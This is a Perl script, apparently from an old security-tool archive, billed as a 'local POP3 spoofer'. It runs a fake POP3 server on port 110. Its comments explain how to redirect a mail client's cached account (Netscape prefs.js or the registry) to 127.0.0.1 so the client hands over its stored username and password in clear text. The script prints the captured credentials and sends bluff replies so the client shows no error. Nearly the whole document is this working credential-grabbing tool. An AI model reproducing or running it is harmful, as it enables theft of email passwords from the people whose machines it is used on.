pop-spoof.pl v0.01 - Local POP3 spoofer: Most email clients these days have the ability to cache passwords and other details (Netscape users look at pref.js explorer registry). Spoof a pop server and edit the prefs.js or registry to try and check 127.0.0.1 and run this Perl script to get the passwords in clear text.
a75ae0370bc2a1ccf96bf370003c745a0fd946f7d2fec37b567a0d50a5977433
# This is a simple tcp server that listens on port 110
# unless another is specified.
# The possible uses of this are;
# Netscape/explorer mail password caching/grabbing
# In netscape edit your prefs.js file so that your pop
# server is your own ip (127.0.0.1) then open netscape
# and click on get mail then this will capture the user.name
# and password. (ps- dont edit your pop account in netscape
# or it will erase the password and prompt for a new one)
# I havent got explorer but the pop server can be changed in
# the registry same should work for other email clients that
# allow password caching.
# Most of this coding was already in the /perl/eg/ folder
# you can find the orginal version there ..
print "===========================\n";
print " Manicx local POP3 spoofer\n";
print " www.infowar.co.uk/manicx/\n";
print "===========================\n";
($port) = @ARGV;
$port = 110 unless $port; # Are port is 110 unless specified
$AF_INET = 2;
$SOCK_STREAM = 1;
$sockaddr = 'S n a4 x8';
($name, $aliases, $proto) = getprotobyname('tcp');
if ($port !~ /^\d+$/) { ($name, $aliases, $port) = getservbyport($port, 'tcp');}
print "Port = $port\n";
$this = pack($sockaddr, $AF_INET, $port, "\0\0\0\0");
select(NS); $| = 1; select(stdout);
socket(S, $AF_INET, $SOCK_STREAM, $proto) || die "socket: $!";
bind(S,$this) || die "bind: $!";
listen(S,5) || die "connect: $!";
select(S); $| = 1; select(stdout);
print "Listening for connection....\n";
($addr = accept(NS,S)) || die $!;
print "Accept ok\n";
($af,$port,$inetaddr) = unpack($sockaddr,$addr);
@inetaddr = unpack('C4',$inetaddr);
print NS "+OK manicx POP3 sniffer ready.\n";
getuserandpass(); # call on our sub
bluffothers(); # call on other sub
#-------------------------------------
sub bluffothers{
$cmd = <NS>;
print $cmd;
$cmd =~ s/\s//g;
if ($cmd eq 'STAT')
{
print NS "+OK 0 0\n";
print "Client wants STAT sent bluff message\n";
bluffothers();
}
elsif ($cmd eq 'QUIT')
{
print "Client wants QUIT sent disconnect\n";
print NS "+OK 127.0.0.1 POP3 server closing connection\n";
sleep 5; #so we dont have an error message in netscape
}
else
{
print "Dont know what client wants sending bluff +ok\n";
print NS "+OK\n";
bluffothers();
}
}
#--------------------------------------
sub getuserandpass {
$user = <NS>;
$user =~ s/\s//g;
if ($user eq 'AUTH')
{
print NS "-ERR USER or QUIT\n";
print "Client wants AUTH? Sent error message :)\n";
getuserandpass()
}
else
{
print $user, "\n";
print NS "+OK Pass\n";
$pass = <NS>;
print $pass;
print NS "+OK Maildrop has 0 messages (0 octets)\n";
}
}
#--------------------------------------
# eek! recursion everywhere ...